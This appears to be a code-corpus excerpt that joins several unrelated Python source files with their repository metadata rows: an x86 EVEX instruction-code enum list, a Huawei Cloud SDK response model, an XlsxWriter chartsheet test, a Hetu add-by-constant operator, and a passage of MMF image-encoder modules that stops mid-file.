EVEX_VFMSUBADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4451
EVEX_VFMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4452
EVEX_VFMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4453
EVEX_VFMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4454
EVEX_VFMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4455
EVEX_VFMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4456
EVEX_VFMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4457
EVEX_VFMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4458
EVEX_VFMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4459
EVEX_VFMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4460
EVEX_VFNMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4461
EVEX_VFNMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4462
EVEX_VFNMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4463
EVEX_VFNMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4464
EVEX_VFNMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4465
EVEX_VFNMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4466
EVEX_VFNMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4467
EVEX_VFNMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4468
EVEX_VFNMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4469
EVEX_VFMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4470
EVEX_VFMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4471
EVEX_VFMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4472
EVEX_VFNMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4473
EVEX_VFNMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4474
EVEX_VFNMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4475
EVEX_VFMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4476
EVEX_VFMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4477
EVEX_VFMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4478
EVEX_VFMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4479
EVEX_VFMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4480
EVEX_VFMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4481
EVEX_VFMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4482
EVEX_VFMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4483
EVEX_VFMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4484
EVEX_VFNMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4485
EVEX_VFNMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4486
EVEX_VFNMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4487
EVEX_VFNMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4488
EVEX_VFNMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4489
EVEX_VFNMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4490
EVEX_VFNMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4491
EVEX_VFNMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4492
EVEX_VFNMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4493
EVEX_VFMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4494
EVEX_VFMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4495
EVEX_VFMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4496
EVEX_VFNMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4497
EVEX_VFNMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4498
EVEX_VFNMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4499
EVEX_VFPCLASSPH_KR_K1_XMMM128B16_IMM8: int = 4500
EVEX_VFPCLASSPH_KR_K1_YMMM256B16_IMM8: int = 4501
EVEX_VFPCLASSPH_KR_K1_ZMMM512B16_IMM8: int = 4502
EVEX_VFPCLASSSH_KR_K1_XMMM16_IMM8: int = 4503
EVEX_VGETEXPPH_XMM_K1Z_XMMM128B16: int = 4504
EVEX_VGETEXPPH_YMM_K1Z_YMMM256B16: int = 4505
EVEX_VGETEXPPH_ZMM_K1Z_ZMMM512B16_SAE: int = 4506
EVEX_VGETEXPSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4507
EVEX_VGETMANTPH_XMM_K1Z_XMMM128B16_IMM8: int = 4508
EVEX_VGETMANTPH_YMM_K1Z_YMMM256B16_IMM8: int = 4509
EVEX_VGETMANTPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4510
EVEX_VGETMANTSH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4511
EVEX_VMAXPH_XMM_K1Z_XMM_XMMM128B16: int = 4512
EVEX_VMAXPH_YMM_K1Z_YMM_YMMM256B16: int = 4513
EVEX_VMAXPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4514
EVEX_VMAXSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4515
EVEX_VMINPH_XMM_K1Z_XMM_XMMM128B16: int = 4516
EVEX_VMINPH_YMM_K1Z_YMM_YMMM256B16: int = 4517
EVEX_VMINPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4518
EVEX_VMINSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4519
EVEX_VMOVSH_XMM_K1Z_M16: int = 4520
EVEX_VMOVSH_M16_K1_XMM: int = 4521
EVEX_VMOVSH_XMM_K1Z_XMM_XMM: int = 4522
EVEX_VMOVSH_XMM_K1Z_XMM_XMM_MAP5_11: int = 4523
EVEX_VMOVW_XMM_R32M16: int = 4524
EVEX_VMOVW_XMM_R64M16: int = 4525
EVEX_VMOVW_R32M16_XMM: int = 4526
EVEX_VMOVW_R64M16_XMM: int = 4527
EVEX_VMULPH_XMM_K1Z_XMM_XMMM128B16: int = 4528
EVEX_VMULPH_YMM_K1Z_YMM_YMMM256B16: int = 4529
EVEX_VMULPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4530
EVEX_VMULSH_XMM_K1Z_XMM_XMMM16_ER: int = 4531
EVEX_VRCPPH_XMM_K1Z_XMMM128B16: int = 4532
EVEX_VRCPPH_YMM_K1Z_YMMM256B16: int = 4533
EVEX_VRCPPH_ZMM_K1Z_ZMMM512B16: int = 4534
EVEX_VRCPSH_XMM_K1Z_XMM_XMMM16: int = 4535
EVEX_VREDUCEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4536
EVEX_VREDUCEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4537
EVEX_VREDUCEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4538
EVEX_VREDUCESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4539
EVEX_VRNDSCALEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4540
EVEX_VRNDSCALEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4541
EVEX_VRNDSCALEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4542
EVEX_VRNDSCALESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4543
EVEX_VRSQRTPH_XMM_K1Z_XMMM128B16: int = 4544
EVEX_VRSQRTPH_YMM_K1Z_YMMM256B16: int = 4545
EVEX_VRSQRTPH_ZMM_K1Z_ZMMM512B16: int = 4546
EVEX_VRSQRTSH_XMM_K1Z_XMM_XMMM16: int = 4547
EVEX_VSCALEFPH_XMM_K1Z_XMM_XMMM128B16: int = 4548
EVEX_VSCALEFPH_YMM_K1Z_YMM_YMMM256B16: int = 4549
EVEX_VSCALEFPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4550
EVEX_VSCALEFSH_XMM_K1Z_XMM_XMMM16_ER: int = 4551
EVEX_VSQRTPH_XMM_K1Z_XMMM128B16: int = 4552
EVEX_VSQRTPH_YMM_K1Z_YMMM256B16: int = 4553
EVEX_VSQRTPH_ZMM_K1Z_ZMMM512B16_ER: int = 4554
EVEX_VSQRTSH_XMM_K1Z_XMM_XMMM16_ER: int = 4555
EVEX_VSUBPH_XMM_K1Z_XMM_XMMM128B16: int = 4556
EVEX_VSUBPH_YMM_K1Z_YMM_YMMM256B16: int = 4557
EVEX_VSUBPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4558
EVEX_VSUBSH_XMM_K1Z_XMM_XMMM16_ER: int = 4559
EVEX_VUCOMISH_XMM_XMMM16_SAE: int = 4560
RDUDBG: int = 4561
WRUDBG: int = 4562
| true | true |
f725f62d736217414f7205feb40dc8ce94818614 | 4,955 | py | Python | huaweicloud-sdk-bssintl/huaweicloudsdkbssintl/v2/model/show_customer_order_details_response.py | githubmilesma/huaweicloud-sdk-python-v3 | 9d9449ed68a609ca65f0aa50b5b2a1c28445bf03 | [
"Apache-2.0"
] | 1 | 2021-04-16T07:59:28.000Z | 2021-04-16T07:59:28.000Z | huaweicloud-sdk-bssintl/huaweicloudsdkbssintl/v2/model/show_customer_order_details_response.py | Lencof/huaweicloud-sdk-python-v3 | d13dc4e2830a83e295be6e4de021999b3376e34e | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-bssintl/huaweicloudsdkbssintl/v2/model/show_customer_order_details_response.py | Lencof/huaweicloud-sdk-python-v3 | d13dc4e2830a83e295be6e4de021999b3376e34e | [
"Apache-2.0"
] | 1 | 2022-01-17T02:24:18.000Z | 2022-01-17T02:24:18.000Z | # coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowCustomerOrderDetailsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'total_count': 'int',
'order_info': 'CustomerOrderV2',
'order_line_items': 'list[OrderLineItemEntityV2]'
}
attribute_map = {
'total_count': 'total_count',
'order_info': 'order_info',
'order_line_items': 'order_line_items'
}
def __init__(self, total_count=None, order_info=None, order_line_items=None):
"""ShowCustomerOrderDetailsResponse - a model defined in huaweicloud sdk"""
super().__init__()
self._total_count = None
self._order_info = None
self._order_line_items = None
self.discriminator = None
if total_count is not None:
self.total_count = total_count
if order_info is not None:
self.order_info = order_info
if order_line_items is not None:
self.order_line_items = order_line_items
@property
def total_count(self):
"""Gets the total_count of this ShowCustomerOrderDetailsResponse.
|参数名称:符合条件的记录总数。| |参数的约束及描述:符合条件的记录总数。|
:return: The total_count of this ShowCustomerOrderDetailsResponse.
:rtype: int
"""
return self._total_count
@total_count.setter
def total_count(self, total_count):
"""Sets the total_count of this ShowCustomerOrderDetailsResponse.
|参数名称:符合条件的记录总数。| |参数的约束及描述:符合条件的记录总数。|
:param total_count: The total_count of this ShowCustomerOrderDetailsResponse.
:type: int
"""
self._total_count = total_count
@property
def order_info(self):
"""Gets the order_info of this ShowCustomerOrderDetailsResponse.
:return: The order_info of this ShowCustomerOrderDetailsResponse.
:rtype: CustomerOrderV2
"""
return self._order_info
@order_info.setter
def order_info(self, order_info):
"""Sets the order_info of this ShowCustomerOrderDetailsResponse.
:param order_info: The order_info of this ShowCustomerOrderDetailsResponse.
:type: CustomerOrderV2
"""
self._order_info = order_info
@property
def order_line_items(self):
"""Gets the order_line_items of this ShowCustomerOrderDetailsResponse.
|参数名称:订单对应的订单项。具体请参见表 OrderLineItemEntity。| |参数约束及描述: 订单对应的订单项。具体请参见表 OrderLineItemEntity。|
:return: The order_line_items of this ShowCustomerOrderDetailsResponse.
:rtype: list[OrderLineItemEntityV2]
"""
return self._order_line_items
@order_line_items.setter
def order_line_items(self, order_line_items):
"""Sets the order_line_items of this ShowCustomerOrderDetailsResponse.
|参数名称:订单对应的订单项。具体请参见表 OrderLineItemEntity。| |参数约束及描述: 订单对应的订单项。具体请参见表 OrderLineItemEntity。|
:param order_line_items: The order_line_items of this ShowCustomerOrderDetailsResponse.
:type: list[OrderLineItemEntityV2]
"""
self._order_line_items = order_line_items
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowCustomerOrderDetailsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 30.398773 | 99 | 0.618769 |
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowCustomerOrderDetailsResponse(SdkResponse):
sensitive_list = []
openapi_types = {
'total_count': 'int',
'order_info': 'CustomerOrderV2',
'order_line_items': 'list[OrderLineItemEntityV2]'
}
attribute_map = {
'total_count': 'total_count',
'order_info': 'order_info',
'order_line_items': 'order_line_items'
}
def __init__(self, total_count=None, order_info=None, order_line_items=None):
super().__init__()
self._total_count = None
self._order_info = None
self._order_line_items = None
self.discriminator = None
if total_count is not None:
self.total_count = total_count
if order_info is not None:
self.order_info = order_info
if order_line_items is not None:
self.order_line_items = order_line_items
@property
def total_count(self):
return self._total_count
@total_count.setter
def total_count(self, total_count):
self._total_count = total_count
@property
def order_info(self):
return self._order_info
@order_info.setter
def order_info(self, order_info):
self._order_info = order_info
@property
def order_line_items(self):
return self._order_line_items
@order_line_items.setter
def order_line_items(self, order_line_items):
self._order_line_items = order_line_items
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, ShowCustomerOrderDetailsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f725f695763bfd4fc762cb3bc2d1ac57a86e383c | 811 | py | Python | xlsxwriter/test/chartsheet/test_initialisation.py | haiyangd/XlsxWriter | 81f8c9435b3e03a1458bf9ba314b5d3f7508290f | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2018-02-26T12:31:41.000Z | 2020-10-10T14:14:11.000Z | xlsxwriter/test/chartsheet/test_initialisation.py | haiyangd/XlsxWriter | 81f8c9435b3e03a1458bf9ba314b5d3f7508290f | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xlsxwriter/test/chartsheet/test_initialisation.py | haiyangd/XlsxWriter | 81f8c9435b3e03a1458bf9ba314b5d3f7508290f | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2017, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...chartsheet import Chartsheet
class TestInitialisation(unittest.TestCase):
"""
Test initialisation of the Chartsheet class and call a method.
"""
def setUp(self):
self.fh = StringIO()
self.chartsheet = Chartsheet()
self.chartsheet._set_filehandle(self.fh)
def test_xml_declaration(self):
"""Test Chartsheet xml_declaration()"""
self.chartsheet._xml_declaration()
exp = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| 24.575758 | 79 | 0.591862 | true | true | |
f725f82a65e7831844437922f04c35e5f5cd1ffc | 1,577 | py | Python | python/hetu/gpu_ops/AddConst.py | HugoZHL/Hetu | 51b0aa3d3deeb9c7a5c8e57aecec7b641db750af | [
"Apache-2.0"
] | null | null | null | python/hetu/gpu_ops/AddConst.py | HugoZHL/Hetu | 51b0aa3d3deeb9c7a5c8e57aecec7b641db750af | [
"Apache-2.0"
] | null | null | null | python/hetu/gpu_ops/AddConst.py | HugoZHL/Hetu | 51b0aa3d3deeb9c7a5c8e57aecec7b641db750af | [
"Apache-2.0"
] | 1 | 2021-08-01T09:05:20.000Z | 2021-08-01T09:05:20.000Z | from __future__ import absolute_import
from .Node import Op
from .._base import DNNL_LIB
from ..cpu_links import matrix_elementwise_add_by_const as cpu_matrix_elementwise_add_by_const
from ..gpu_links import matrix_elementwise_add_by_const
class AddByConstOp(Op):
def __init__(self, node_A, const_val, ctx=None):
super().__init__(AddByConstOp, [node_A], ctx)
self.const_attr = const_val
@property
def desc(self):
return self.name + '(%s, %s)' % (self.inputs[0].name, str(self.const_attr))
def compute(self, input_vals, output_val, stream_handle=None):
if self.on_cpu:
if DNNL_LIB['DnnlMatrixElementwiseAddByConst']:
cpu_matrix_elementwise_add_by_const(
input_vals[0], self.const_attr, output_val)
else:
output_val[:] = input_vals[0].asnumpy() + self.const_attr
else:
matrix_elementwise_add_by_const(
input_vals[0], self.const_attr, output_val, stream_handle)
def gradient(self, output_grad):
return [output_grad]
def infer_shape(self, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
def addbyconst_op(node, const_val, ctx=None):
"""Make a new instance of AddByConstOp and call the instance.
Parameters:
----
node : Node
The Node to be added.
const_val : scalar value
The constant value to be added.
Returns:
----
A new Node instance created by Op.
"""
return AddByConstOp(node, const_val, ctx=ctx)
| 30.326923 | 94 | 0.660748 | from __future__ import absolute_import
from .Node import Op
from .._base import DNNL_LIB
from ..cpu_links import matrix_elementwise_add_by_const as cpu_matrix_elementwise_add_by_const
from ..gpu_links import matrix_elementwise_add_by_const
class AddByConstOp(Op):
def __init__(self, node_A, const_val, ctx=None):
super().__init__(AddByConstOp, [node_A], ctx)
self.const_attr = const_val
@property
def desc(self):
return self.name + '(%s, %s)' % (self.inputs[0].name, str(self.const_attr))
def compute(self, input_vals, output_val, stream_handle=None):
if self.on_cpu:
if DNNL_LIB['DnnlMatrixElementwiseAddByConst']:
cpu_matrix_elementwise_add_by_const(
input_vals[0], self.const_attr, output_val)
else:
output_val[:] = input_vals[0].asnumpy() + self.const_attr
else:
matrix_elementwise_add_by_const(
input_vals[0], self.const_attr, output_val, stream_handle)
def gradient(self, output_grad):
return [output_grad]
def infer_shape(self, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
def addbyconst_op(node, const_val, ctx=None):
return AddByConstOp(node, const_val, ctx=ctx)
| true | true |
f725fa58d83ac3bdbfb6b9632641decaf448c44e | 29,514 | py | Python | mmf/modules/encoders.py | facebookresearch/pythia | 079740bee4b357a7b1b866d35e2f1fad6edba8a4 | [
"BSD-3-Clause"
] | 3,252 | 2018-07-27T02:32:24.000Z | 2020-05-07T17:54:46.000Z | mmf/modules/encoders.py | facebookresearch/pythia | 079740bee4b357a7b1b866d35e2f1fad6edba8a4 | [
"BSD-3-Clause"
] | 209 | 2018-07-30T06:39:59.000Z | 2020-05-04T22:03:48.000Z | mmf/modules/encoders.py | facebookresearch/pythia | 079740bee4b357a7b1b866d35e2f1fad6edba8a4 | [
"BSD-3-Clause"
] | 431 | 2018-07-27T04:17:37.000Z | 2020-05-05T13:58:02.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
import importlib
import logging
import os
import pickle
import re
from collections import OrderedDict
from copy import deepcopy
from dataclasses import asdict, dataclass
from enum import Enum
from typing import Any
import torch
import torchvision
from mmf.common.registry import registry
from mmf.models.frcnn import GeneralizedRCNN
from mmf.modules.embeddings import ProjectionEmbedding, TextEmbedding
from mmf.modules.hf_layers import BertModelJit
from mmf.modules.layers import Identity
from mmf.utils.build import build_image_encoder, build_text_encoder
from mmf.utils.download import download_pretrained_model
from mmf.utils.file_io import PathManager
from mmf.utils.general import get_absolute_path
from mmf.utils.logger import log_class_usage
from omegaconf import MISSING, OmegaConf
from torch import nn, Tensor
from transformers.configuration_auto import AutoConfig
from transformers.modeling_auto import AutoModel
try:
from detectron2.modeling import build_resnet_backbone, ShapeSpec
except ImportError:
pass
logger = logging.getLogger()
class Encoder(nn.Module):
@dataclass
class Config:
name: str = MISSING
def __init__(self):
super().__init__()
log_class_usage("Encoder", self.__class__)
@classmethod
def from_params(cls, **kwargs):
config = OmegaConf.structured(cls.Config(**kwargs))
return cls(config)
class EncoderFactory(nn.Module):
@dataclass
class Config:
type: str = MISSING
params: Encoder.Config = MISSING
class ImageFeatureEncoderTypes(Enum):
default = "default"
identity = "identity"
projection = "projection"
frcnn_fc7 = "finetune_faster_rcnn_fpn_fc7"
class ImageFeatureEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
in_dim: int = MISSING
class ImageFeatureEncoderFactory(EncoderFactory):
@dataclass
class Config(EncoderFactory.Config):
type: ImageFeatureEncoderTypes = MISSING
params: ImageFeatureEncoder.Config = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
encoder_type = config.type
if isinstance(encoder_type, ImageFeatureEncoderTypes):
encoder_type = encoder_type.value
assert (
"in_dim" in config.params
), "ImageFeatureEncoder require 'in_dim' param in config"
params = config.params
if encoder_type == "default" or encoder_type == "identity":
self.module = Identity()
self.module.in_dim = params.in_dim
self.module.out_dim = params.in_dim
elif encoder_type == "projection":
if "module" not in params:
params = deepcopy(params)
params.module = "linear"
self.module = ProjectionEmbedding(**params)
elif encoder_type == "finetune_faster_rcnn_fpn_fc7":
self.module = FinetuneFasterRcnnFpnFc7(params)
else:
raise NotImplementedError("Unknown Image Encoder: %s" % encoder_type)
self.out_dim = self.module.out_dim
def forward(self, *args, **kwargs):
return self.module(*args, **kwargs)
@registry.register_encoder("finetune_faster_rcnn_fpn_fc7")
class FinetuneFasterRcnnFpnFc7(ImageFeatureEncoder):
@dataclass
class Config(ImageFeatureEncoder.Config):
name: str = "finetune_faster_rcnn_fpn_fc7"
in_dim: int = MISSING
weights_file: str = "fc7_w.pkl"
bias_file: str = "fc7_b.pkl"
model_data_dir: str = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
model_data_dir = get_absolute_path(config.model_data_dir)
if not os.path.isabs(config.weights_file):
weights_file = os.path.join(model_data_dir, config.weights_file)
if not os.path.isabs(config.bias_file):
bias_file = os.path.join(model_data_dir, config.bias_file)
if not PathManager.exists(bias_file) or not PathManager.exists(weights_file):
download_path = download_pretrained_model("detectron.vmb_weights")
weights_file = get_absolute_path(os.path.join(download_path, "fc7_w.pkl"))
bias_file = get_absolute_path(os.path.join(download_path, "fc7_b.pkl"))
with PathManager.open(weights_file, "rb") as w:
weights = pickle.load(w)
with PathManager.open(bias_file, "rb") as b:
bias = pickle.load(b)
out_dim = bias.shape[0]
self.lc = nn.Linear(config.in_dim, out_dim)
self.lc.weight.data.copy_(torch.from_numpy(weights))
self.lc.bias.data.copy_(torch.from_numpy(bias))
self.out_dim = out_dim
def _load_from_state_dict(
self,
state_dict,
prefix,
local_metadata,
strict,
missing_keys,
unexpected_keys,
error_msgs,
):
old_prefix = prefix + "module."
for k in list(state_dict.keys()):
if k.startswith(old_prefix):
new_k = k.replace(old_prefix, prefix)
state_dict[new_k] = state_dict.pop(k)
super()._load_from_state_dict(
state_dict,
prefix,
local_metadata,
strict,
missing_keys,
unexpected_keys,
error_msgs,
)
def forward(self, image):
i2 = self.lc(image)
i3 = nn.functional.relu(i2)
return i3
@registry.register_encoder("identity")
class IdentityEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "identity"
# Random in_dim if not specified
in_dim: int = 100
def __init__(self, config: Config):
super().__init__()
self.module = nn.Identity()
self.in_dim = config.get("in_dim", 100)
self.out_dim = self.in_dim
def forward(self, x):
return self.module(x)
class ImageEncoderTypes(Enum):
default = "default"
identity = "identity"
torchvision_resnet = "torchvision_resnet"
resnet152 = "resnet152"
detectron2_resnet = "detectron2_resnet"
class ImageEncoderFactory(EncoderFactory):
@dataclass
class Config(EncoderFactory.Config):
type: ImageEncoderTypes = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self._type = config.type
if isinstance(self._type, ImageEncoderTypes):
self._type = self._type.value
params = config.params
if self._type == "default" or self._type == "identity":
self.module = nn.Identity()
self.module.out_dim = params.in_dim
elif self._type == "resnet152":
self.module = ResNet152ImageEncoder(params)
elif self._type == "torchvision_resnet":
self.module = TorchvisionResNetImageEncoder(params)
elif self._type == "detectron2_resnet":
self.module = Detectron2ResnetImageEncoder(params)
elif self._type == "frcnn":
self.module = FRCNNImageEncoder(params)
else:
raise NotImplementedError("Unknown Image Encoder: %s" % self._type)
@property
def out_dim(self):
return self.module.out_dim
def forward(self, image):
return self.module(image)
# Taken from facebookresearch/mmbt with some modifications
@registry.register_encoder("resnet152")
class ResNet152ImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "resnet152"
pretrained: bool = True
# "avg" or "adaptive"
pool_type: str = "avg"
num_output_features: int = 1
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
model = torchvision.models.resnet152(pretrained=config.get("pretrained", True))
modules = list(model.children())[:-2]
self.model = nn.Sequential(*modules)
pool_func = (
nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
)
# -1 will keep the original feature size
if config.num_output_features == -1:
self.pool = nn.Identity()
elif config.num_output_features in [1, 2, 3, 5, 7]:
self.pool = pool_func((config.num_output_features, 1))
elif config.num_output_features == 4:
self.pool = pool_func((2, 2))
elif config.num_output_features == 6:
self.pool = pool_func((3, 2))
elif config.num_output_features == 8:
self.pool = pool_func((4, 2))
elif config.num_output_features == 9:
self.pool = pool_func((3, 3))
self.out_dim = 2048
def forward(self, x):
# Bx3x224x224 -> Bx2048x7x7 -> Bx2048xN -> BxNx2048
out = self.pool(self.model(x))
out = torch.flatten(out, start_dim=2)
out = out.transpose(1, 2).contiguous()
return out # BxNx2048
@registry.register_encoder("torchvision_resnet")
class TorchvisionResNetImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "resnet50"
pretrained: bool = False
zero_init_residual: bool = True
num_output_features: int = -1
pool_type: str = "avg"
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
model = getattr(torchvision.models, config.name)(
pretrained=config.pretrained, zero_init_residual=config.zero_init_residual
)
# checks if use_avgpool exists to maintain the old logic
self.use_avgpool = config.get("use_avgpool", None)
if self.use_avgpool: # use_avgpool is True
config.num_output_features = 1
config.pool_type = "avg"
elif self.use_avgpool is False: # use_avgpool is False
config.num_output_features = -1
if config.pretrained:
model = self._load_pretrained(model, config)
modules = list(model.children())[:-2]
self.model = nn.Sequential(*modules)
self.pool = self._pool_func(config)
self.out_dim = config.get("out_dim", 2048)
def _load_pretrained(self, model, config: Config):
pretrained_model = config.get("pretrained_model", "supervised")
if pretrained_model == "supervised":
pass # this is already loaded via torchvision using pretrained=True
elif os.path.exists(pretrained_model):
model.load_state_dict(torch.load(pretrained_model))
else:
try:
with PathManager.open(pretrained_model, "rb") as f:
model.load_state_dict(
torch.load(f, map_location=lambda storage, loc: storage),
strict=False,
)
except Exception:
raise Exception(f"unknown pretrained ResNet model: {pretrained_model}")
return model
def _pool_func(self, config: Config):
pool_func = (
nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
)
# -1 will keep the original feature size
if config.num_output_features == -1:
pool = nn.Identity()
elif config.num_output_features in [1, 2, 3, 5, 7]:
pool = pool_func((config.num_output_features, 1))
elif config.num_output_features == 4:
pool = pool_func((2, 2))
elif config.num_output_features == 6:
pool = pool_func((3, 2))
elif config.num_output_features == 8:
pool = pool_func((4, 2))
elif config.num_output_features == 9:
pool = pool_func((3, 3))
return pool
def forward(self, x):
# B x 3 x 224 x 224 -> B x out_dim x 7 x 7
out = self.pool(self.model(x))
if self.use_avgpool is None:
out = torch.flatten(out, start_dim=2)
out = out.transpose(1, 2).contiguous() # BxNxout_dim
else:
out = torch.flatten(out, start_dim=1) # BxN*out_dim
return out
@registry.register_encoder("detectron2_resnet")
class Detectron2ResnetImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "detectron2_resnet"
pretrained: bool = True
pretrained_path: str = None
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
pretrained = config.get("pretrained", False)
pretrained_path = config.get("pretrained_path", None)
self.resnet = build_resnet_backbone(config, ShapeSpec(channels=3))
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
pretrained_path, progress=False
)
new_state_dict = OrderedDict()
replace_layer = {"backbone.": ""}
for key, value in state_dict["model"].items():
new_key = re.sub(
r"(backbone\.)", lambda x: replace_layer[x.groups()[0]], key
)
new_state_dict[new_key] = value
self.resnet.load_state_dict(new_state_dict, strict=False)
self.out_dim = 2048
def forward(self, x):
x = self.resnet(x)
return x["res5"]
@registry.register_encoder("frcnn")
